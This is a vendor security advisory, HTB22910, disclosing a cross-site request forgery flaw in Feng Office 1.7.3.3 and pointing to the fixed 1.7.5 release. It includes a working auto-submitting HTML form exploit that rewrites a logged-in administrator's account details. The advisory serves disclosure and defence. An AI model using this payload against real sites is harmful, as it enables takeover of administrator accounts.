Total Tests:

Cross-site Request Forgery (CSRF) in Feng Office

This vulnerability was discovered by our security researchers before 2019.

Advisory ID:HTB22910
Product:Feng Office
Vendor:Secure Data SRL
Vulnerable Versions:1.7.3.3 and probably prior
Tested Version:1.7.3.3
Advisory Publication:March 17, 2011 [without technical details]
Vendor Notification:March 17, 2011
Public Disclosure:March 31, 2011
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
Medium Risk
CVSSv2 Base Score:5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Feng Office which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) in Feng Office
The vulnerability exists due to insufficient validation of the request origin in index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify administrator`s credentials.
Exploitation example:
<form action="http://host/index.php?active_project=0&ajax=true&c=account&a=edit_pr ofile&id=USERID&current=administration" method="post" name="main">
<input type="hidden" name="user[display_name]" value="test">
<input type="hidden" name="user[username]" value="test">
<input type="hidden" name="user[company_id]" value="1">
<input type="hidden" name="user[personal_project_id]" value="2">
<input type="hidden" name="user[type]" value="admin">
<input type="hidden" name="user[auto_assign]" value="0">
<input type="hidden" name="user[autodetect_time_zone]" value="1">
<input type="hidden" name="user[timezone]" value="0">
<input type="hidden" name="user[email]" value="[email protected]">
<input type="hidden" name="user[title]" value="">
</form>
<script>
document.main.submit();
</script>


Solution:
Upgrade to Feng Office 1.7.5
Link to the patched version: http://sourceforge.net/projects/opengoo/files/fengoffice/fengoffice_1.7.5/fengoffice_1.7.5.zip/download


References:
[1] High-Tech Bridge Advisory HTB22910 - https://www.immuniweb.com/advisory/HTB22910 - Cross-site Request Forgery (CSRF) in Feng Office
[2] Feng Office - fengoffice.com- Feng Office is a Web-based Software that integrates Project Management, Client Relationship Management, Billing, Financing, among other features that help you efficiently run your Professional Services Business.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Ask a Question